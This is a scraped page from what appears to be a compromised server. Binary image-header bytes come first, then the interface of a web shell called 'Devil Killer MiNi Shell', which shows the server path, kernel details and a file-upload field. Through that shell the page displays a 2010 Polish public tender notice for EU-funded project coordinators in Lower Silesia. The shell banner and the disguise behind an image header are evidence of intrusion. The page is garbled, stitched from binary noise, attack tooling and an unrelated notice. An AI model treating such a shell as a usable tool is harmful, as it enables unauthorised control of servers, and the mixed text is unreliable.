JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/326944-N-2010.html

<p class="kh_header"><b>Wrocław: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań.</b><br>
<b>Numer ogłoszenia: 326944 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Wojewódzka Komenda OHP , ul. Wybrzeże Juliusza Słowackiego 9, 50-413 Wrocław, woj. dolnośląskie, tel. 071 3444908, faks 071 3424901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dolnoslaska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów i opiekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi i wyjaśnień.
d)Udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego  w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia dla zadań nr 1, 2, 3, 4, 5 Zamawiający uzna dysponowanie min. 1 osobą dla każdego z zadań, posiadającą wykształcenie wyższe i min. 2 letnie doświadczenie zawodowe w zakresie wdrażania projektów współfinansowanych ze środków Unii Europejskiej.  
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz oferty - wg załącznika do SIWZ.
2.Zaakceptowany projekt umowy - wg załącznika do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności.
2.Dopuszcza się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty,
na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1. Zmiana terminu realizacji zadania: 
a)	konieczności zlecenia zamówień dodatkowych, w trybie zgodnym z przepisami ustawy prawo zamówień publicznych;
b)	zmiana terminu wdrażania projektu. 
2.2. Zmiany osobowe:
a)	zmiany osób realizujących zamówienie  pod warunkiem, że osoby te będą spełniały wymagania określone 
w SIWZ;
2.3.	Pozostałe zmiany: 
a)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np.: powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia);	
b)	zmiany wysokości środków finansowych przeznaczonych na realizację umowy w kolejnych latach budżetowych;
c)	przypadki losowe (np. kataklizmy, awarie urządzeń wywołane przez wyładowania atmosferyczne lub inne czynniki zewnętrzne, zgony i niemożliwe do przewidzenia wydarzenia), które będą miały wpływ na treść zawartej umowy i termin realizacji;
d) obniżenie wynagrodzenia Wykonawcy;
e) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia i udokumentowane koszty, które wykonawca poniósł w związku z Wynikającymi z umowy planowanymi świadczeniami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląską Wojewódzka Komenda Ochotniczych Hufców Pracy, 50- 413 Wrocław   ul. Wybrzeże Słowackiego 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 15:00, miejsce: W siedzibie Zamawiającego we Wrocławiu,
przy ul. Wybrzeże Słowackiego  9 w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Młodość - Aktywność - Praca jest  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych  i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów      i ekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów  i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
c)Współpraca z Kierownikiem Projektu oraz Działem Wdrażania Projektów Europejskich 
i Współpracy Międzynarodowej Dolnośląskiej Wojewódzkiej Komendy Ochotniczych Hufców Pracy w zakresie realizacji projektu, a także udzielanie im niezbędnych odpowiedzi 
i wyjaśnień.
d)Udział w Komisjach rekrutacyjnych, negocjacyjnych i przetargowych.
e)Zrekrutowanie, zgodnie z zapisami zawartymi we wniosku o dofinansowanie, odpowiedniej ilości uczestników spełniających kryteria kwalifikujące do wzięcia udziału w projekcie oraz zatwierdzenie Deklaracji uczestnictwa w Projekcie. 
f)Bieżąca obsługa projektu np. sporządzanie harmonogramu zajęć, dbanie o sprawny przebieg informacji, kontrola list obecności i posiłków, bieżąca kontrola frekwencji na szkoleniach,   prowadzenie dokumentacji projektowej, kontrola podmiotów zewnętrznych realizujących dane zadanie, nadzór,  wydatkowanie i akceptowanie płatności przewidzianych dla danego regionu wg budżetu, etc.
g)Monitorowanie prawidłowego wydatkowania  środków finansowych zgodnie z Preliminarzem Projektu,
h)Sporządzanie informacji miesięcznej - tabeli monitorującej realizacje projektu, 
i)Przygotowywanie informacji ustnych i pisemnych dotyczących stanu realizacji projektu 
na żądanie Zleceniodawcy, w tym przygotowanie sprawozdań merytorycznych dotyczących realizacji projektu oraz stanu zapotrzebowania i wydatkowania środków finansowych.
j)Opracowywanie raportów i innych dokumentów w terminie i według wzoru określonego               w umowie nr UDA-POKL.07.02.01-02-004/09-00 dnia 15 marca 2010 r. ( m.in. wniosku 
o płatność oraz dokumentacji rozliczeniowej wniosku o płatność ),
k)Kontrolowanie i opisywanie pod względem merytorycznym dokumentów finansowo- księgowych dotyczących projektu Młodość- Aktywność- Praca.
l)Reprezentowanie projektu Młodość- Aktywność- Praca w kontaktach zewnętrznych.
m)Administrowanie sprzętem zakupionym w ramach realizacji projektu.
n)Promocja projektu zgodna z wytycznymi zawartymi w dokumentach programowych POKL,
o)Właściwa dystrybucja dostarczonych przez Zamawiającego materiałów promocyjnych, 
p)Sporządzanie formularza PEFS (i przekazywanie go z zachowaniem procedur bezpieczeństwa Kierownikowi Projektu) oraz wszystkich dokumentów z tym związanych.
q)Monitoring i ewaluacja projektu, w tym przeprowadzenie ewaluacji ex-post i zebranie stosownych dokumentów w 6 miesięcy po zakończeniu projektu,
r)Wsparcie i motywowanie uczestników projektu do końca ich uczestnictwa w projekcie. 
s)Wykonywanie innych czynności wynikających z obowiązujących przepisów 
i poleceń Kierownika.
t)Wykonawca zobowiązany będzie do przestrzegania zapisów Ustawy o Ochronie Danych Osobowych (Dz. U. 2002r. nr 101, poz. 926, tekst jednolity
8.Zamawiający nie będzie ponosił kosztów związanych z dojazdem do miejsca realizacji zadania oraz kosztów diet, noclegów, rozmów telefonicznych itd. Wykonawca ponosi wszystkie koszty realizacji zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Świadczenie usług koordynatora terenowego projektu regionalnego Młodość - Aktywność - Praca współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z podziałem na 5 zadań. CPV 79421000-1. 
2.Termin realizacji zamówienia: od dnia podpisania umowy do 31.05.2011r. 
3.Miejsce realizacji zadań: 
a)Zadanie nr 1 - we Wrocławiu,
b)Zadanie nr 2 - w Legnicy,
c)Zadanie nr 3 -  w Jeleniej Górze,
d)Zadanie nr 4 - w Wołowie,
e)Zadanie nr 5 - w Wałbrzychu i Świdnicy. 
4.Zajęcia w ramach projektu odbywać będą się we: Wrocławiu (40 osób), Legnicy (20 osób), Jeleniej Górze (20 osób), Wołowie (30 osób), Wałbrzychu i Świdnicy (20 osób). Wałbrzych                   i Świdnicy podlegają jednemu koordynatorowi terenowemu. Łącznie w projekcie weźmie udział 130 osób, w tym 39 osób niepełnosprawnych w stopniu lekkim bądź umiarkowanym.
5.Zajęcia w ramach projektu mogą odbywać się od poniedziałku do niedzieli w godzinach 8.00-20.00 z przerwą 15 minut po min. 1 godzinie zajęć.
6. Koordynatorzy terenowi projektu będą podlegać bezpośrednio Kierownikowi Projektu i będą  przed Nim odpowiedzialni za wykonywanie swoich zadań.
7.Zakres czynności Koordynatora dla zadania nr 1, 2, 3, 4, 5:
a)Koordynowanie i monitoring przebiegu prac poszczególnych wykonawców w projekcie działających na jego terenie (w tym: firm, specjalistów, wykładowców, asystentów                            i opiekunów, etc.), w celu zrealizowania projektu zgodnie  z obowiązującą w ramach POKL dokumentacją, obowiązującymi przepisami prawa, umową o dofinansowanie projektu, zaplanowanym budżetem oraz w zaplanowanym w harmonogramie projektu terminie oraz w sposób zmierzający do osiągnięcia  założonych we wniosku o dofinansowanie rezultatów                  i efektów. 
b)Organizacja spotkań roboczych z udziałem podmiotów zaangażowanych w realizację poszczególnych zadań.
